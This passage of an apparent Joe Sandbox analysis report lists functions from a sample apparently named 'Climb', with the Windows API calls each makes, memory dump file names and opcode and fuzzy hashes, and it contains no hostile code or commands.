SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0055F45D
GetWindowThreadProcessId.USER32(?,?), ref: 0055F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0055F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0055F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0055F48C

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 51ebca586a04e3d3279487d5e17481ecdc4ce8c7d5ee3e5d85d3a5954c64dbc1
Instruction ID: 6e245a51fcc48e5b88b8e11082e1785f5df5531676ef47a0b2f9741eae9486b5
Opcode Fuzzy Hash: 51ebca586a04e3d3279487d5e17481ecdc4ce8c7d5ee3e5d85d3a5954c64dbc1
Instruction Fuzzy Hash: 7FF01D32241158BBE72157529C0EEEB3BBCEFD6B11F001059FA01A10D0E7A15A05E7B5

Function 005334D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 005334EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00533506
GetWindowDC.USER32(?), ref: 00533512
GetPixel.GDI32(00000000,?,?), ref: 00533521
ReleaseDC.USER32(?,00000000), ref: 00533533
GetSysColor.USER32(00000005), ref: 0053354D

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 929ec0b3b0b4d83bf8a8e8758bdb7e0b34d6ad1b973c41d6b0cc993b11119399
Instruction ID: 629699fe576f102de16bd2f9b19597dcb890fa11f16271558ca14704d6efc249
Opcode Fuzzy Hash: 929ec0b3b0b4d83bf8a8e8758bdb7e0b34d6ad1b973c41d6b0cc993b11119399
Instruction Fuzzy Hash: C6011631500109EFDB506B64DC08FA97BB2FB14721F510561FE1AA21E0DB321A55AB21

Function 005521C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 005521CC
UnloadUserProfile.USERENV(?,?), ref: 005521D8
CloseHandle.KERNEL32(?), ref: 005521E1
CloseHandle.KERNEL32(?), ref: 005521E9
GetProcessHeap.KERNEL32(00000000,?), ref: 005521F2
HeapFree.KERNEL32(00000000), ref: 005521F9

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 2291b76c1b9402c8c8798232d3e7589ca4fe626f0981e9b0626f01cde1869afa
Instruction ID: 469d656bb9b4ae2573957630d7e1a1c0f90b2b39591d17895a02cf2b2bd8d873
Opcode Fuzzy Hash: 2291b76c1b9402c8c8798232d3e7589ca4fe626f0981e9b0626f01cde1869afa
Instruction Fuzzy Hash: 55E0E576004105BBDB012FA1EC0CD0ABFB9FF69322B105620FA25A20B4CB339424FB60

Function 0057B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0057B903

Part of subcall function 004F41EA: _wcslen.LIBCMT ref: 004F41EF

GetProcessId.KERNEL32(00000000), ref: 0057B998
CloseHandle.KERNEL32(00000000), ref: 0057B9C7

Strings

<, xrefs: 0057B8CB
@, xrefs: 0057B8D2

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: b8ff87dfd0778e581360ad3d94e92f31c7963870711dae4dc07d82ce853f46ea
Instruction ID: daa939c4c1a7d06e42dca1ca23628ee3c5ac05aaff2578cca3b8a82c51ccfccf
Opcode Fuzzy Hash: b8ff87dfd0778e581360ad3d94e92f31c7963870711dae4dc07d82ce853f46ea
Instruction Fuzzy Hash: 0F716874A00219DFDB10DF55C494A9EBBF4FF08304F04849DE959AB292CB74ED45DB91

Function 00584818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005848D1
IsMenu.USER32(?), ref: 005848E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0058492E
DrawMenuBar.USER32 ref: 00584941

Strings

0, xrefs: 00584825

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 326719d648e90d993531de969ee39e49c5cb8fd9e9bc014c9e238f887a913109
Instruction ID: 91747e3bae826adc2394317022e45d321168ff0a40c994a85670c176ede53ea6
Opcode Fuzzy Hash: 326719d648e90d993531de969ee39e49c5cb8fd9e9bc014c9e238f887a913109
Instruction Fuzzy Hash: 1F413875A0120AEFDB20EF51D884EAABBB9FF16324F044129ED55A7250D730AD54DF60

Function 0055272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005527B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005527C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 005527F6

Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A

Strings

ComboBox, xrefs: 0055273D
ListBox, xrefs: 00552772

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 01533282edd55ed687c51a3299cb82e6f437f1df34cff0f70cd68fe0c2e465ae
Instruction ID: a712610733e535115022a27fc051857f49c021f964126127e9bca52823812cb6
Opcode Fuzzy Hash: 01533282edd55ed687c51a3299cb82e6f437f1df34cff0f70cd68fe0c2e465ae
Instruction Fuzzy Hash: 0921E471940108BADB05ABA0DC56DFE7FB8EF46364F10412AF911A71E1DB38494D9B60

Function 005839B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00583A29
LoadLibraryW.KERNEL32(?), ref: 00583A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00583A45
DestroyWindow.USER32(?), ref: 00583A4D

Strings

SysAnimate32, xrefs: 00583A04

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: d04e9e39aa210b5e5a891d9237362a4d952bce33d2581af1959791411730199b
Instruction ID: 9aab9fa915063aa6d687c5c12430f263e02a2741c2993fc8ee73fd4a75e65a74
Opcode Fuzzy Hash: d04e9e39aa210b5e5a891d9237362a4d952bce33d2581af1959791411730199b
Instruction Fuzzy Hash: 7D219D71600209ABEF14AFA4DC84FBB7BE9FB54B64F105618FE91A21E0D771CD41A760

Function 00589A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

GetCursorPos.USER32(?), ref: 00589A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00589A72
GetCursorPos.USER32(?), ref: 00589ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00589AF0

Strings

(\, xrefs: 00589A30

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID: (\
API String ID: 2864067406-3685820393
Opcode ID: 342f0f3bf41eab552e8b7f323146b4ad605642d681c66116e60d9855137b7b4d
Instruction ID: 05bea93b2eae21533d257db2179f05e8b6894dc294163d82f696668d08c0cd23
Opcode Fuzzy Hash: 342f0f3bf41eab552e8b7f323146b4ad605642d681c66116e60d9855137b7b4d
Instruction Fuzzy Hash: AF21BC34600018AFCF29AF95CC88EFA7FB9FB49350F584169FD05AB1A1D7749950EB60

Function 004F1AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 004F1AF4
GetClientRect.USER32(?,?), ref: 005331F9
GetCursorPos.USER32(?), ref: 00533203
ScreenToClient.USER32(?,?), ref: 0053320E

Strings

(\, xrefs: 004F1AB2

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID: (\
API String ID: 4127811313-3685820393
Opcode ID: 0ec5ea889114145457e07c05a6b896d6120b68963cfadebc7394d7ebd3688266
Instruction ID: a5a400e59dc1a21d06240346e3ec92b3b08282e1b89a91765abced68f3a07ecb
Opcode Fuzzy Hash: 0ec5ea889114145457e07c05a6b896d6120b68963cfadebc7394d7ebd3688266
Instruction Fuzzy Hash: DF112531A0111DEBCF00EFA9C9859FE7BB8FB05354F100456EA02A3190D775AA95DBA5

Function 005150DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0051508E,?,?,0051502E,?,005B98D8,0000000C,00515185,?,00000002), ref: 005150FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00515110
FreeLibrary.KERNEL32(00000000,?,?,?,0051508E,?,?,0051502E,?,005B98D8,0000000C,00515185,?,00000002,00000000), ref: 00515133

Strings

CorExitProcess, xrefs: 00515108
mscoree.dll, xrefs: 005150F6

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2a43b0133911d1e37ed460596368e1038e54907343f68dfd4a5b9a8c33384957
Instruction ID: 9cca3fdfb9dd98f82aa0fae45922803e94ffe7cb6cd2d575e798962656b7b77f
Opcode Fuzzy Hash: 2a43b0133911d1e37ed460596368e1038e54907343f68dfd4a5b9a8c33384957
Instruction Fuzzy Hash: ECF0AF30A40619BBEB119F94DC09BEDBFF5FF54762F400064F805A21A0EB749A84DBA4

Function 004F663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,004F668B,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004F665C
FreeLibrary.KERNEL32(00000000,?,?,004F668B,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F666E

Strings

kernel32.dll, xrefs: 004F6642
Wow64DisableWow64FsRedirection, xrefs: 004F6656

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 2be2b8a2654295b8b5e5bafabaf735ba768c46b3aa1e3cc051f4024ca7b0e25b
Instruction ID: 173cf4317dfff95c4879e1b4c5d1f03740a0c36f62dc4dd79b4fa3f5e9d1d66f
Opcode Fuzzy Hash: 2be2b8a2654295b8b5e5bafabaf735ba768c46b3aa1e3cc051f4024ca7b0e25b
Instruction Fuzzy Hash: 64E0E63570162267E2212725BC0CB7B67B89F92F26B060116FD04F2294DF58CD05D7B9

Function 004F6607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00535657,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F6610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004F6622
FreeLibrary.KERNEL32(00000000,?,?,00535657,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F6635

Strings

kernel32.dll, xrefs: 004F6609
Wow64RevertWow64FsRedirection, xrefs: 004F661C

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: dec1d1eaa74f96d351c776aa3f00ae815f0d2494cc47bc34444353df4b0d0645
Instruction ID: bc0768320d7cdda94ebcab151aa786453c646312dd7707a4b0849f7fe30d1ce0
Opcode Fuzzy Hash: dec1d1eaa74f96d351c776aa3f00ae815f0d2494cc47bc34444353df4b0d0645
Instruction Fuzzy Hash: ACD01235612A3567923227297C1DA9F6B64AEA6F213460016FD00F2394CF68CD06D7BC

Function 00563306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 005635C4
DeleteFileW.KERNEL32(?), ref: 00563646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0056365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0056366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0056367F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 49e863ddf5013dcb22a4b047549f5efa86e9d1cfc5116a0bdaf0e1bf2c073ec1
Instruction ID: 3fcd39e9fbd1b21f9b5d995162effd594745671056440a671f1e11957775108f
Opcode Fuzzy Hash: 49e863ddf5013dcb22a4b047549f5efa86e9d1cfc5116a0bdaf0e1bf2c073ec1
Instruction Fuzzy Hash: 61B16F72901119ABDF11EBA4CC89EDEBBBCFF48354F1040AAF609A7141EA349B448B61

Function 0057ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0057AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0057AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0057AEC8
CloseHandle.KERNEL32(?), ref: 0057B09D

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 367d499284b8234f1537b4552230c24b532dfe6ea3f6752af1a5b5f91da36b12
Instruction ID: fbb40cb62b77d26dba3e8d0a867c1f20923c71eaac9689f6a9829d1a9c1043c9
Opcode Fuzzy Hash: 367d499284b8234f1537b4552230c24b532dfe6ea3f6752af1a5b5f91da36b12
Instruction Fuzzy Hash: 9CA1A0716003019FE720DF25D88AB2ABBE5BF84714F54881DF9599B2D2DB71EC408B86

Function 0057C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Part of subcall function 0057D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0057C10E,?,?), ref: 0057D415
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D451
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4C8
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0057C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0057C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0057C5C3
RegCloseKey.ADVAPI32(?,?), ref: 0057C606
RegCloseKey.ADVAPI32(00000000), ref: 0057C613

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 6f6fd1478fb8dbc7b608fa34bdfab4b270bf863272f0cda09918fc75f0bba56e
Instruction ID: 25ef7613d325df05898784e016e1faa8515eef8767996a358c0f0f227490f276
Opcode Fuzzy Hash: 6f6fd1478fb8dbc7b608fa34bdfab4b270bf863272f0cda09918fc75f0bba56e
Instruction Fuzzy Hash: 6461AE71208241AFC714DF14D894E2ABFE5FF84308F14899DF49A8B292DB31ED46DB92

Function 0055ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0055E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0055D7CD,?), ref: 0055E714

Part of subcall function 0055E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0055D7CD,?), ref: 0055E72D

Part of subcall function 0055EAB0: GetFileAttributesW.KERNEL32(?,0055D840), ref: 0055EAB1

lstrcmpiW.KERNEL32(?,?), ref: 0055ED8A
MoveFileW.KERNEL32(?,?), ref: 0055EDC3
_wcslen.LIBCMT ref: 0055EF02
_wcslen.LIBCMT ref: 0055EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0055EF67

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 5fb46a8c98240d385deecdf13135945a10f11e7916a37519d1f87800915015b2
Instruction ID: 5dd638fdfba15fe1a0d7e240940e704a5136ae4bf8d21b21dfb3f7a0e4c16610
Opcode Fuzzy Hash: 5fb46a8c98240d385deecdf13135945a10f11e7916a37519d1f87800915015b2
Instruction Fuzzy Hash: 58514DB20083859BD724EB90D8969DBB7ECEF85351F00092FEA8593151EF35A68C8766

